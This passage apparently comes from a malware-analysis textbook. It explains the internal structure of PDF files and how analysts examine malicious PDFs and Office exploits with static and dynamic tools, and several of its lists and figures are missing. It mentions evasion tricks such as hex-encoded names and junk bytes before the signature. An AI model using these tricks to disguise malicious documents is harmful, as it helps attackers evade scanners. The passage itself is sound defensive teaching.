Once we can reliably reproduce the exploit being triggered, we can attach it to the targeted module of the corresponding Microsoft Office product and keep debugging it until we see the payload being triggered. Then, we can intercept this moment and dive deep into how it works.
The Portable Document Format (PDF) was developed by Adobe in the 90s for uniformly presenting documents, regardless of the application software or operating system used. Originally proprietary, it was released as an open standard in 2008. Unfortunately, due to its popularity, multiple attackers misuse it to deliver their malicious payloads. Let’s see how they work and how they can be analyzed.
A PDF is a tree file that consists of objects that implement one of eight data types:
Apart from this, it is possible to use comments with the help of the percentage (%) sign.
All complex data objects (such as images or JavaScript entries) are stored using basic data types. In many cases, objects will have the corresponding dictionary mentioning the data type with the actual data stored in a stream.
PDF documents generally start with the %PDF signature, followed by the format version number (for example, 1.7) separated by a dash. However, because the PDF documents are read from the end, this is not guaranteed, and different PDF viewers allow a different number of arbitrary bytes to be placed in front of this signature (in most cases, at least 1000):
Figure 8.20 – Arbitrary bytes in front of the %PDF signature of a valid document
Multiple keywords can define the boundaries and types of the data objects, as follows:
Figure 8.21 – The xref table in the PDF document
Another less common option is a cross-reference stream, which serves the same purpose.
Figure 8.22 – Example of the object in PDF document
The following are the most common entries that might be of interest to analysts when they’re analyzing malicious PDFs:
Figure 8.23 – The /FlateDecode filter used in a PDF document
It is worth mentioning that in the modern specification, it is possible to replace parts of these names (or even the whole name) with #XX hexadecimal representations. So, /URI can become /#55RI or even /#55#52#49.
Some entries may reference other objects using the letter R. For example, /Length 15 0 R means that the actual length value is stored in a separate object, 15, in generation 0. When the file is updated, a new object with the incremented generation number is added.
Now, it is time to learn how malicious PDF files can be analyzed. In this section, we will cover various tools that can assist with the analysis and give some guidelines on when and how they should be used.
In many cases, static analysis can answer pretty much any question that an engineer has when analyzing these types of samples. Multiple dedicated open source tools can make this process pretty straightforward. Let’s explore some of the most popular ones:
Figure 8.24 – The PDFStreamDumper tool
Apart from these, multiple tools and libraries can facilitate analysis by parsing a PDF’s structure, decrypting documents, or decoding streams. This includes qpdf, PyPDF2, and origami.
When performing static analysis for malicious PDF files, it usually makes sense to start by listing the actions as well as the different types of objects. Pay particular attention to the suspicious entries we listed previously. Decode all the encoded streams to see what’s inside as they may contain malicious modules.
If the JavaScript object has been extracted, follow the recommendations for both static and dynamic analysis that have been provided in Chapter 10, Scripts and Macros – Reversing, Deobfuscation, and Debugging. In many cases, the exploit functionality is implemented using this language. ActionScript is much less common nowadays as Flash Player has been discontinued.
In terms of dynamic analysis, the same steps that were taken for Microsoft Office exploits can be followed:
If the actual exploit body is written in some other language (such as JavaScript), it might be more convenient to debug parts of it separately while emulating the environment that’s required for the exploit to work. This will also be covered in Chapter 10, Scripts and Macros – Reversing, Deobfuscation, and Debugging.
In this chapter, we became familiar with various types of vulnerabilities, the exploits that target them, and different techniques that aim to battle them. Then, we learned about shellcode, how it is different for different platforms, and how it can be analyzed.
Finally, we covered other common types of exploits that are used nowadays in the wild – that is, malicious PDF and Microsoft Office documents – and explained how to examine them. With this knowledge, you can gauge the attacker’s mindset and understand the logic behind various techniques that can be used to compromise the target system.
In Chapter 9, Reversing Bytecode Languages – .NET, Java, and More, we will learn how to handle malware that’s been written using bytecode languages, what challenges the engineer may face during the analysis, and how to deal with them.